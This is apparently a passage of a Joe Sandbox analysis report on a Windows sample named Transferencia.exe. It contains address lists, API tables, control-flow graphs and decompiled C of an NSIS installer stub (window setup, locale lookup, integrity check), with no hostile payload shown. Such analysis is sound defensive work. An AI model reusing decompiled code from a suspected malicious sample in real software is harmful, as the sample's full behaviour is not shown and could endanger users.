                                                						}
                                                					}
                                                				}
                                                			}































                                                0x00403f82
                                                0x00403f89
                                                0x004040f0
                                                0x004040f4
                                                0x004040f8
                                                0x004040fa
                                                0x004040ff
                                                0x0040410a
                                                0x00404115
                                                0x0040411a
                                                0x0040411c
                                                0x0040411e
                                                0x00404121
                                                0x00404126
                                                0x00404134
                                                0x00404141
                                                0x00404148
                                                0x00404148
                                                0x00404149
                                                0x00404149
                                                0x0040414e
                                                0x00404154
                                                0x0040415b
                                                0x00404161
                                                0x00404163
                                                0x004041a3
                                                0x004041a8
                                                0x004041ad
                                                0x004041ad
                                                0x004041b2
                                                0x004041bb
                                                0x004041bd
                                                0x004041c2
                                                0x004041c8
                                                0x004041cc
                                                0x004041cc
                                                0x004041d1
                                                0x004041d7
                                                0x00000000
                                                0x00000000
                                                0x004041e2
                                                0x004041e8
                                                0x00000000
                                                0x00000000
                                                0x004041f1
                                                0x004041f9
                                                0x004041fe
                                                0x00404201
                                                0x00404207
                                                0x0040420c
                                                0x0040420f
                                                0x00404215
                                                0x0040421a
                                                0x0040421d
                                                0x00404223
                                                0x0040422b
                                                0x00404231
                                                0x00404237
                                                0x0040423b
                                                0x00404242
                                                0x00404242
                                                0x00404242
                                                0x0040424c
                                                0x0040425e
                                                0x0040426a
                                                0x0040426f
                                                0x00404279
                                                0x0040427f
                                                0x00404281
                                                0x00404286
                                                0x00404283
                                                0x00404283
                                                0x00404283
                                                0x00404296
                                                0x004042ae
                                                0x004042b0
                                                0x004042b6
                                                0x004042cb
                                                0x004042b8
                                                0x004042c1
                                                0x004042c3
                                                0x004042c3
                                                0x004042d1
                                                0x004042e2
                                                0x004042f8
                                                0x004042ff
                                                0x00404309
                                                0x0040430e
                                                0x00404310
                                                0x00000000
                                                0x00404316
                                                0x00404316
                                                0x00404318
                                                0x00000000
                                                0x00000000
                                                0x0040431e
                                                0x00404322
                                                0x00404347
                                                0x0040434d
                                                0x00404353
                                                0x00404355
                                                0x00000000
                                                0x00000000
                                                0x0040437b
                                                0x00404381
                                                0x00404383
                                                0x00404388
                                                0x00000000
                                                0x00000000
                                                0x0040438e
                                                0x00404391
                                                0x00404394
                                                0x004043ab
                                                0x004043b7
                                                0x004043d0
                                                0x004043da
                                                0x004043df
                                                0x004043e5
                                                0x00000000
                                                0x00000000
                                                0x004043ef
                                                0x004043fa
                                                0x00000000
                                                0x004043fa
                                                0x00404324
                                                0x0040432a
                                                0x00000000
                                                0x00000000
                                                0x00404330
                                                0x00404336
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040433c
                                                0x00404310
                                                0x00404407
                                                0x00404413
                                                0x0040441a
                                                0x00000000
                                                0x00404165
                                                0x00404165
                                                0x00404168
                                                0x0040419b
                                                0x0040419b
                                                0x0040419d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040419d
                                                0x0040416e
                                                0x00404173
                                                0x00404175
                                                0x00000000
                                                0x00000000
                                                0x00404185
                                                0x0040418d
                                                0x00000000
                                                0x00404193
                                                0x00403f9b
                                                0x00403f9b
                                                0x00403f9f
                                                0x00403fa4
                                                0x00403fb3
                                                0x00403fb3
                                                0x00403fb9
                                                0x00403fc0
                                                0x00404004
                                                0x0040400a
                                                0x00404023
                                                0x00404026
                                                0x00404039
                                                0x0040403f
                                                0x00000000
                                                0x00000000
                                                0x00404045
                                                0x00404050
                                                0x00404052
                                                0x00404054
                                                0x00404073
                                                0x00404073
                                                0x00404076
                                                0x0040407b
                                                0x0040407e
                                                0x0040408e
                                                0x0040408f
                                                0x00404091
                                                0x004040c7
                                                0x004040d7
                                                0x00000000
                                                0x004040d7
                                                0x00404093
                                                0x00404099
                                                0x004040b2
                                                0x004040b7
                                                0x004040b9
                                                0x00000000
                                                0x00000000
                                                0x004040bb
                                                0x004040a7
                                                0x004040a7
                                                0x004040a9
                                                0x004040a9
                                                0x00000000
                                                0x004040a9
                                                0x0040409c
                                                0x004040a1
                                                0x00000000
                                                0x004040a1
                                                0x00404080
                                                0x00404086
                                                0x00000000
                                                0x00000000
                                                0x00404088
                                                0x00000000
                                                0x00404088
                                                0x00404078
                                                0x00000000
                                                0x00404078
                                                0x0040405e
                                                0x00404065
                                                0x0040406b
                                                0x0040406d
                                                0x00404443
                                                0x00000000
                                                0x00404443
                                                0x00000000
                                                0x0040406d
                                                0x0040402b
                                                0x00000000
                                                0x00404033
                                                0x00404012
                                                0x00404018
                                                0x00404420
                                                0x00404426
                                                0x00404433
                                                0x00404439
                                                0x00404439
                                                0x00000000
                                                0x00403fc2
                                                0x00403fc7
                                                0x00403fd3
                                                0x00403fdc
                                                0x004040dd
                                                0x00000000
                                                0x00403ffb
                                                0x00403ffe
                                                0x00000000
                                                0x00403ffe
                                                0x00403fdc
                                                0x00403fc0

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                                                • ShowWindow.USER32(?), ref: 00403FD3
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                                                • ShowWindow.USER32(?,00000004), ref: 00403FFE
                                                • DestroyWindow.USER32 ref: 00404012
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                                                • GetDlgItem.USER32 ref: 0040404A
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                                                • IsWindowEnabled.USER32(00000000), ref: 00404065
                                                • GetDlgItem.USER32 ref: 00404110
                                                • GetDlgItem.USER32 ref: 0040411A
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404134
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                                                • GetDlgItem.USER32 ref: 0040422B
                                                • ShowWindow.USER32(00000000,?), ref: 0040424C
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                                                • EnableWindow.USER32(?,?), ref: 00404279
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                                                • EnableMenuItem.USER32 ref: 00404296
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                                                • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                                                • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                                                • ShowWindow.USER32(?,0000000A), ref: 00404433
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 3618520773-0
                                                • Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                                                • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                                                • Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                                                • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bc9-403be1 call 4068e7 304 403be3-403bf3 call 406461 301->304 305 403bf5-403c2c call 4063e8 301->305 313 403c4f-403c78 call 403e9f call 405ef1 304->313 310 403c44-403c4a lstrcatW 305->310 311 403c2e-403c3f call 4063e8 305->311 310->313 311->310 319 403d0a-403d12 call 405ef1 313->319 320 403c7e-403c83 313->320 326 403d20-403d45 LoadImageW 319->326 327 403d14-403d1b call 406557 319->327 320->319 321 403c89-403cb1 call 4063e8 320->321 321->319 328 403cb3-403cb7 321->328 330 403dc6-403dce call 40140b 326->330 331 403d47-403d77 RegisterClassW 326->331 327->326 335 403cc9-403cd5 lstrlenW 328->335 336 403cb9-403cc6 call 405e16 328->336 343 403dd0-403dd3 330->343 344 403dd8-403de3 call 403e9f 330->344 332 403e95 331->332 333 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 331->333 341 403e97-403e9e 332->341 333->330 337 403cd7-403ce5 lstrcmpiW 335->337 338 403cfd-403d05 call 405de9 call 40651a 335->338 336->335 337->338 342 403ce7-403cf1 GetFileAttributesW 337->342 338->319 347 403cf3-403cf5 342->347 348 403cf7-403cf8 call 405e35 342->348 343->341 354 403de9-403e03 ShowWindow call 406877 344->354 355 403e6c-403e6d call 40564f 344->355 347->338 347->348 348->338 362 403e05-403e0a call 406877 354->362 363 403e0f-403e21 GetClassInfoW 354->363 358 403e72-403e74 355->358 360 403e76-403e7c 358->360 361 403e8e-403e90 call 40140b 358->361 360->343 364 403e82-403e89 call 40140b 360->364 361->332 362->363 367 403e23-403e33 GetClassInfoW RegisterClassW 363->367 368 403e39-403e5c DialogBoxParamW call 40140b 363->368 364->343 367->368 371 403e61-403e6a call 403b19 368->371 371->341
                                                C-Code - Quality: 96%
                                                			E00403BC9(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x7a8a70;
                                                				_t22 = E004068E7(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x7a1f48;
                                                					L"1033" = 0x30;
                                                					 *0x7b5002 = 0x78;
                                                					 *0x7b5004 = 0;
                                                					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
                                                					__eflags =  *0x7a1f48;
                                                					if(__eflags == 0) {
                                                						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406461(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403E9F(_t78, _t90);
                                                				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                                                				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
                                                				 *0x7a8afc = 0x10000;
                                                				if(E00405EF1(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                					L16:
                                                					if(E00405EF1(_t98, _t86) == 0) {
                                                						E00406557(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                					}
                                                					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040); // executed
                                                					 *0x7a7a48 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403E9F(_t78, __eflags);
                                                							__eflags =  *0x7a8b00;
                                                							if( *0x7a8b00 != 0) {
                                                								_t33 = E0040564F(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x7a7a2c;
                                                								if( *0x7a7a2c == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x7a1f28, 5); // executed
                                                							_t39 = E00406877("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E00406877("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
                                                								 *0x7a7a24 = _t87;
                                                								RegisterClassW(0x7a7a00);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
                                                							E00403B19(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x7a8a60;
                                                						 *0x7a7a04 = E00401000;
                                                						 *0x7a7a10 =  *0x7a8a60;
                                                						 *0x7a7a14 = _t30;
                                                						 *0x7a7a24 = 0x40a380;
                                                						if(RegisterClassW(0x7a7a00) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x7a6a00;
                                                					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
                                                					_t63 =  *0x7a6a00; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x7a6a02;
                                                						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E0040651A(_t86, E00405DE9(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E35(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403bcf
                                                0x00403bd8
                                                0x00403bdf
                                                0x00403be1
                                                0x00403bf5
                                                0x00403c07
                                                0x00403c10
                                                0x00403c19
                                                0x00403c20
                                                0x00403c25
                                                0x00403c2c
                                                0x00403c3f
                                                0x00403c3f
                                                0x00403c4a
                                                0x00403be3
                                                0x00403bee
                                                0x00403bee
                                                0x00403c4f
                                                0x00403c59
                                                0x00403c62
                                                0x00403c67
                                                0x00403c78
                                                0x00403d0a
                                                0x00403d12
                                                0x00403d1b
                                                0x00403d1b
                                                0x00403d31
                                                0x00403d37
                                                0x00403d45
                                                0x00403dc6
                                                0x00403dce
                                                0x00403dd8
                                                0x00403ddd
                                                0x00403de3
                                                0x00403e6d
                                                0x00403e72
                                                0x00403e74
                                                0x00403e90
                                                0x00000000
                                                0x00403e90
                                                0x00403e76
                                                0x00403e7c
                                                0x00403e84
                                                0x00403e84
                                                0x00000000
                                                0x00403e7c
                                                0x00403df1
                                                0x00403dfc
                                                0x00403e01
                                                0x00403e03
                                                0x00403e0a
                                                0x00403e0a
                                                0x00403e15
                                                0x00403e1d
                                                0x00403e1f
                                                0x00403e21
                                                0x00403e2a
                                                0x00403e2d
                                                0x00403e33
                                                0x00403e33
                                                0x00403e52
                                                0x00403e63
                                                0x00000000
                                                0x00403e68
                                                0x00403dd0
                                                0x00403dd2
                                                0x00000000
                                                0x00403d47
                                                0x00403d47
                                                0x00403d53
                                                0x00403d5d
                                                0x00403d63
                                                0x00403d68
                                                0x00403d77
                                                0x00403e95
                                                0x00403e95
                                                0x00000000
                                                0x00403e95
                                                0x00403d86
                                                0x00403dc1
                                                0x00000000
                                                0x00403dc1
                                                0x00403c7e
                                                0x00403c7e
                                                0x00403c81
                                                0x00403c83
                                                0x00000000
                                                0x00000000
                                                0x00403c91
                                                0x00403ca3
                                                0x00403ca8
                                                0x00403cb1
                                                0x00000000
                                                0x00000000
                                                0x00403cb7
                                                0x00403cb9
                                                0x00403cc6
                                                0x00403cc6
                                                0x00403ccf
                                                0x00403cd5
                                                0x00403cfd
                                                0x00403d05
                                                0x00000000
                                                0x00403ce7
                                                0x00403ce8
                                                0x00403cf1
                                                0x00403cf7
                                                0x00403cf8
                                                0x00000000
                                                0x00403cf8
                                                0x00403cf3
                                                0x00403cf5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403cf5
                                                0x00403cd5

                                                APIs
                                                  • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                  • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76CDFAA0), ref: 00403CCA
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
                                                • LoadImageW.USER32 ref: 00403D31
                                                  • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                                                • RegisterClassW.USER32 ref: 00403D6E
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
                                                • CreateWindowExW.USER32 ref: 00403DBB
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
                                                • GetClassInfoW.USER32 ref: 00403E1D
                                                • GetClassInfoW.USER32 ref: 00403E2A
                                                • RegisterClassW.USER32 ref: 00403E33
                                                • DialogBoxParamW.USER32 ref: 00403E52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-2935473529
                                                • Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                                                • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                                                • Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                                                • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 378 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 389 403110-403127 388->389 391 403129 389->391 392 40312b-403134 call 4034ac 389->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 397 403205-40321d call 4034c2 call 4034ac 395->397 398 403227-403251 GlobalAlloc call 4034c2 call 4032b4 395->398 396->380 397->396 421 40321f-403225 397->421 398->396 426 403264-403275 398->426 401->396 405 403143-403157 call 405fc5 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069d4 411->418 417->389 425 4031ee 417->425 418->417 421->396 421->398 424->411 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->411 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fc5 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                C-Code - Quality: 80%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				signed int _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				signed int _t65;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = L"C:\\Users\\jones\\Desktop\\Transferencia.exe";
                                                				 *0x7a8a6c = _t43 + 0x3e8;
                                                				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\Transferencia.exe", 0x400);
                                                				_t89 = E0040600A(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E0040651A(0x7b4800, _t91);
                                                				E0040651A(0x7b7000, E00405E35(0x7b4800));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				__eflags = _t50;
                                                				 *0x79f704 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					__eflags =  *0x7a8a74 - _t82;
                                                					if( *0x7a8a74 == _t82) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v8 - _t82;
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x40385a
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034C2( *0x7a8a74 + 0x1c);
                                                						_t35 =  &_v24; // 0x40385a
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						__eflags = _t57 - _v24;
                                                						if(_t57 == _v24) {
                                                							__eflags = _v44 & 0x00000001;
                                                							 *0x7a8a70 = _t94;
                                                							 *0x7a8a78 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x7a8a7c =  *0x7a8a7c + 1;
                                                								__eflags =  *0x7a8a7c;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                								__eflags = _t85;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034C2( *0x7936f8);
                                                					_t65 = E004034AC( &_a4, 4);
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v12 - _a4;
                                                					if(_v12 != _a4) {
                                                						goto L29;
                                                					}
                                                					goto L28;
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
                                                						__eflags = _t93 - _t70;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						_t71 = E004034AC(0x78b6f8, _t90);
                                                						__eflags = _t71;
                                                						if(_t71 == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x7a8a74;
                                                						if( *0x7a8a74 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FC5( &_v44, 0x78b6f8, 0x1c);
                                                						_t77 = _v44;
                                                						__eflags = _t77 & 0xfffffff0;
                                                						if((_t77 & 0xfffffff0) != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v40 - 0xdeadbeef;
                                                						if(_v40 != 0xdeadbeef) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v28 - 0x74736e49;
                                                						if(_v28 != 0x74736e49) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v32 - 0x74666f73;
                                                						if(_v32 != 0x74666f73) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v36 - 0x6c6c754e;
                                                						if(_v36 != 0x6c6c754e) {
                                                							goto L20;
                                                						}
                                                						_a4 = _a4 | _t77;
                                                						_t87 =  *0x7936f8; // 0x3da2f
                                                						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
                                                						_t80 = _v20;
                                                						__eflags = _t80 - _t93;
                                                						 *0x7a8a74 = _t87;
                                                						if(_t80 > _t93) {
                                                							goto L29;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L16:
                                                							_v8 = _v8 + 1;
                                                							_t93 = _t80 - 4;
                                                							__eflags = _t90 - _t93;
                                                							if(_t90 > _t93) {
                                                								_t90 = _t93;
                                                							}
                                                							goto L20;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							break;
                                                						}
                                                						goto L16;
                                                						L20:
                                                						__eflags = _t93 -  *0x79f704; // 0x3e100
                                                						if(__eflags < 0) {
                                                							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
                                                						}
                                                						 *0x7936f8 =  *0x7936f8 + _t90;
                                                						_t93 = _t93 - _t90;
